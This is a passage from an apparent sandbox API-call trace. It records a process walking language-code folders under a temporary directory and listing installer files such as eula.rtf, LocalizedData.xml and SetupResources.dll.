dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.857] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0045.857] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.857] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260748 [0045.857] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.857] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.858] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.858] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.858] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.858] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0045.858] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.858] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0045.858] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.858] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42601c8 [0045.858] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.858] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.858] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.859] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.859] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.859] FindClose (in: hFindFile=0x42601c8 | out: hFindFile=0x42601c8) returned 1 [0045.859] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.859] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0045.859] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.859] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260108 [0045.860] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.861] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.861] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.861] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.861] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.862] FindClose (in: hFindFile=0x4260108 | out: hFindFile=0x4260108) returned 1 [0045.862] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.862] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0045.862] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.862] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260388 [0045.863] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.863] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.863] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.863] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.864] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.865] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0045.865] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.865] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0045.865] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.865] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260188 [0045.866] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.866] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.866] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.866] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.866] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.866] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0045.866] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.866] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0045.866] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.866] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42601c8 [0045.867] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.868] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.868] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.868] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.868] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.869] FindClose (in: hFindFile=0x42601c8 | out: hFindFile=0x42601c8) returned 1 [0045.869] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.869] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0045.869] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.869] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, 